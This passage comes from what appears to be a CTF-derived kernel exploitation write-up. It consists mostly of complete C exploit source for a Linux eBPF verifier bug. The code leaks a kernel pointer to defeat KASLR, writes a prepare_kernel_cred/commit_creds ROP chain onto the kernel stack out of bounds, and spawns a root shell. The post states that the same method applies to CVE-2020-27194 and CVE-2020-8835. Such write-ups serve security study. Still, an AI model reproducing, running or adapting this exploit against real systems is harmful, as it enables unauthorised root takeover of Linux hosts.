		BPF_LD_IMM64(BPF_REG_6, 0x8000000000000000),
		BPF_JMP_REG(BPF_JLE, BPF_REG_5, BPF_REG_6, 1),  // if r5 <= r6 goto pc+1
		BPF_EXIT_INSN(),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_5),   // r5 += r5 (bounds wrap to [0, 0])
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),            // r6 = r5
		BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 33),          // r6 >>= 33: verifier 0, run time 1

		// ---------- op == 0: leak ----------
		BPF_MOV64_REG(BPF_REG_7, BPF_REG_8),            // r7 = &map[0]
		BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0x8), // r5 = op = map[1]
		BPF_JMP_IMM(BPF_JNE, BPF_REG_5, 0, 5),          // op != 0: skip to the write path
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),       // r6 *= 0x110
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),   // r7 = &map[0] - 0x110
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_7, 0),
		BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0x10), // map[2] = *(&map[0] - 0x110)
		BPF_EXIT_INSN(),

		// ---------- op != 0: write the ROP chain onto the stack ----------
		BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),           // r7 = fp, for out-of-bounds stack access
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -0x38),       // r7 = fp - 0x38
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x20),        // r6 = 0x20; must not exceed 0x38,
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // so it is added twice
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // r7 = fp + 0x8: rop[0]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x18),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 2),           // r6 = 8: step to the next slot
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[1]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 4*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[2]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 5*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[3]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 6*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[4]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 7*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[5]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 8*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[6]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 9*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[7]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 10*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[8]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 11*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[9]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 12*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[10]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 13*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[11]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 14*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),   // rop[12]
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 15*8),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),
		BPF_MOV64_IMM(BPF_REG_0, 0x0),
		BPF_EXIT_INSN(),
	};

	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, my_prog, sizeof(my_prog), "GPL", 0);
}

static void prep(void)
{
	exp_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1, 0);
	if (exp_mapfd < 0)
		__exit(strerror(errno));

	progfd = load_my_prog();
	if (progfd < 0) {
		printf("%s\n", bpf_log_buf);
		__exit(strerror(errno));
	}
	//printf("success:%s\n", bpf_log_buf);

	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
		__exit(strerror(errno));

	if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
		__exit(strerror(errno));
}

/* Send a datagram through the socket pair so the attached filter runs. */
static void writemsg(void)
{
	char buffer[64] = {0};
	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %zd\n", n);
}

/* map[0] = input (r6 becomes 1 at run time), map[1] = op, then run the program. */
static void update_elem(uint32_t op)
{
	exp_buf[0] = 0x100000000;
	exp_buf[1] = op;
	bpf_update_elem(0, exp_buf, exp_mapfd, 0);
	writemsg();
}

/* Read the map value back into buffer (the leak lands in buffer[2]). */
static void infoleak(uint64_t *buffer, int mapfd)
{
	uint64_t key = 0;

	if (bpf_lookup_elem(&key, buffer, mapfd))
		__exit(strerror(errno));
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

/* Save the user-mode CS, SS, RSP and RFLAGS for the final iretq frame. */
void save_stat(void)
{
	asm(
		"movq %%cs, %0;"
		"movq %%ss, %1;"
		"movq %%rsp, %2;"
		"pushfq;"
		"popq %3;"
		: "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags) : : "memory");
}

void get_shell(void)
{
	if (!getuid()) {
		printf("[+] you got root!\n");
		system("/bin/sh");
	} else {
		printf("[T.T] privilege escalation failed !!!\n");
	}
	exit(0);
}

static void pwn(void)
{
	uint64_t kernel_base;

	//---------------- leak info -----------------------
	update_elem(0);
	infoleak(exp_buf, exp_mapfd);
	uint64_t map_leak = exp_buf[2];
	printf("[+] leak array_map_ops:0x%lX\n", map_leak);

	/* Offsets below are specific to the author's kernel build. */
	kernel_base = map_leak - 0x1017B40;
	printf("[+] leak kernel_base addr:0x%lX\n", kernel_base);

	unsigned long prepare_kernel = kernel_base + 0x08fc80;
	unsigned long commit_creds = kernel_base + 0x08f880;
	unsigned long pop_rdi_ret = kernel_base + 0x0016a8;  // pop rdi; ret;
	unsigned long xchg_rax_rdi = kernel_base + 0x89a3f3; // xchg rax, rdi; dec dword ptr [rax - 0x77]; ret;
	unsigned long kpti_ret = kernel_base + 0xc00df0 + 0x16; // swapgs_restore_regs_and_return_to_usermode + 0x16

	int i = 3;                                  // rop[0] is map[3]
	exp_buf[i++] = pop_rdi_ret;                 // rop[0]
	exp_buf[i++] = 0;                           // rop[1]
	exp_buf[i++] = prepare_kernel;              // rop[2]
	exp_buf[i++] = xchg_rax_rdi;                // rop[3]
	exp_buf[i++] = commit_creds;                // rop[4]
	exp_buf[i++] = kpti_ret;                    // rop[5]
	exp_buf[i++] = 0;                           // rop[6]
	exp_buf[i++] = 0;                           // rop[7]
	exp_buf[i++] = (uint64_t)&get_shell;        // rop[8]
	exp_buf[i++] = user_cs;                     // rop[9]
	exp_buf[i++] = user_rflags;                 // rop[10]
	exp_buf[i++] = user_sp;                     // rop[11]
	exp_buf[i++] = user_ss;                     // rop[12]

	update_elem(1);
}

int main(void)
{
	save_stat();
	prep();
	pwn();
	return 0;
}
```
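The user-space code and the BPF program communicate through the single 0x100-byte array-map element. The struct below is a hypothetical view of that element, reconstructed from the offsets used in `load_my_prog` and `pwn`. The 0x110 distance from the element back to the map's ops pointer and the 0x1017B40 offset of `array_map_ops` come from the exploit's own constants and are specific to the author's kernel build. `struct exp_map_value` and `rop_slot_from_fp` are illustrative names.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout of exp_buf / the map value shared with the BPF program. */
struct exp_map_value {
    uint64_t input;   /* 0x00: r5; 0x100000000 makes r6 equal 1 at run time */
    uint64_t op;      /* 0x08: 0 = leak, nonzero = write the ROP chain */
    uint64_t leak;    /* 0x10: receives *(value - 0x110), i.e. the map's ops */
    uint64_t rop[13]; /* 0x18..0x78: copied to fp + 0x8 .. fp + 0x68 */
    uint64_t pad[16]; /* fills the element up to value_size = 0x100 */
};

_Static_assert(sizeof(struct exp_map_value) == 0x100, "value_size");
_Static_assert(offsetof(struct exp_map_value, rop) == 0x18, "rop[0] is map[3]");

/* Stack offset (relative to the BPF frame pointer) that receives rop[i]. */
static int64_t rop_slot_from_fp(unsigned int i)
{
    return 0x8 + 8 * (int64_t)i;
}
```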



提权效果:

The exploitation approach in this post also applies to CVE-2020-27194 and CVE-2020-8835; interested readers can try it themselves.

References

https://xz.aliyun.com/t/8463#toc-6

https://www.kernel.org/doc/Documentation/networking/filter.txt

https://zhuanlan.zhihu.com/p/137277724

Challenge environment: https://github.com/De4dCr0w/kernel-pwn/tree/master/geekpwn2020
